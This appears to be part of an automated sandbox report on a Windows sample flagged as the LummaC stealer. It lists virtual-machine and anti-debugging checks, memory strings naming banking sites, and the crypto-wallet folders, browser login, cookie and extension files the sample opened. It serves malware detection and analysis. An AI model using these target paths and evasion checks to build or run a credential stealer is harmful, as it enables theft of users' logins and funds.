Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: Amcache.hve.14.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: Amcache.hve.14.dr	Binary or memory string: VMware VMCI Bus Device
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual RAM
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: Amcache.hve.14.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: I5jG2Os8GA.exe, 00000000.00000002.3055237243.00000000044B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhZ
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: Amcache.hve.14.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: I5jG2Os8GA.exe, 00000000.00000003.1835336290.00000000044C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696501413p
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

API call chain: ExitProcess graph end node

graph_0-70801

Anti Debugging

Contains functionality to hide a thread from the debugger

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64

0_2_004244E4

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

graph_0-70885

Hides threads from debuggers

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Process queried: DebugFlags	Jump to behavior

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_00429EF7 rdtsc

0_2_00429EF7

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0044E33B

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,

0_2_0041F9A4

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00422177 mov eax, dword ptr fs:[00000030h]	0_2_00422177
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h]	0_2_00443998
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h]	0_2_0041F9A4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h]	0_2_004262A1
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h]	0_2_0043B362
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h]	0_2_0044FB15
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h]	0_2_004244E4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h]	0_2_004224A3
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004245EC mov eax, dword ptr fs:[00000030h]	0_2_004245EC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h]	0_2_00421EEB
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00422817 mov eax, dword ptr fs:[00000030h]	0_2_00422817
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h]	0_2_0041F916
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h]	0_2_004269E4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]	0_2_00424995
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]	0_2_00424995
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h]	0_2_00426A42
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h]	0_2_0042F265
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h]	0_2_00424B24
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h]	0_2_0041EBEB
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00424BED mov eax, dword ptr fs:[00000030h]	0_2_00424BED
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h]	0_2_00424C8D
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h]	0_2_0041E6F0
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h]	0_2_00429EF7
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_02778D5B push dword ptr fs:[00000030h]	0_2_02778D5B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421FC0B mov eax, dword ptr fs:[00000030h]	0_2_0421FC0B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04226C4B mov eax, dword ptr fs:[00000030h]	0_2_04226C4B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04226CA9 mov eax, dword ptr fs:[00000030h]	0_2_04226CA9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422F4CC mov eax, dword ptr fs:[00000030h]	0_2_0422F4CC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04226508 mov eax, dword ptr fs:[00000030h]	0_2_04226508
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0424FD7C mov eax, dword ptr fs:[00000030h]	0_2_0424FD7C
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04224D8B mov eax, dword ptr fs:[00000030h]	0_2_04224D8B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04200D90 mov eax, dword ptr fs:[00000030h]	0_2_04200D90
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423B5C9 mov eax, dword ptr fs:[00000030h]	0_2_0423B5C9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421EE52 mov eax, dword ptr fs:[00000030h]	0_2_0421EE52
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04224E54 mov eax, dword ptr fs:[00000030h]	0_2_04224E54
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04224EF4 mov eax, dword ptr fs:[00000030h]	0_2_04224EF4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422270A mov eax, dword ptr fs:[00000030h]	0_2_0422270A
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422474B mov eax, dword ptr fs:[00000030h]	0_2_0422474B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04224853 mov eax, dword ptr fs:[00000030h]	0_2_04224853
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0420092B mov eax, dword ptr fs:[00000030h]	0_2_0420092B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04222152 mov eax, dword ptr fs:[00000030h]	0_2_04222152
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421E957 mov eax, dword ptr fs:[00000030h]	0_2_0421E957
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422A15E mov eax, dword ptr fs:[00000030h]	0_2_0422A15E
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04222A7E mov eax, dword ptr fs:[00000030h]	0_2_04222A7E
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421FB7D mov eax, dword ptr fs:[00000030h]	0_2_0421FB7D
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04243BFF mov ecx, dword ptr fs:[00000030h]	0_2_04243BFF
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04224BFC mov eax, dword ptr fs:[00000030h]	0_2_04224BFC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04224BFC mov eax, dword ptr fs:[00000030h]	0_2_04224BFC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042223DE mov eax, dword ptr fs:[00000030h]	0_2_042223DE

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC,

0_2_0043323B

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0044E33B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0043D3A0
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043CE89 SetUnhandledExceptionFilter,	0_2_0043CE89
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043CE95
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0424E5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0424E5A2
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423D607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0423D607
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423D0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0423D0FC

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_0043D0B8 cpuid

0_2_0043D0B8

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_0044614F

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_00402476 GetComputerNameW,GetUserNameW,

0_2_00402476

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_00453BC4 GetTimeZoneInformation,

0_2_00453BC4

Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 0.3.I5jG2Os8GA.exe.4280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.I5jG2Os8GA.exe.4280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.I5jG2Os8GA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.I5jG2Os8GA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1263036918.0000000004280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: I5jG2Os8GA.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: I5jG2Os8GA.exe	String found in binary or memory: %appdata%\Electrum\wallets
Source: I5jG2Os8GA.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: I5jG2Os8GA.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: I5jG2Os8GA.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: I5jG2Os8GA.exe, 00000000.00000002.3059014580.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: I5jG2Os8GA.exe, 00000000.00000002.3059014580.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum
Source: I5jG2Os8GA.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: I5jG2Os8GA.exe, 00000000.00000002.3059014580.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
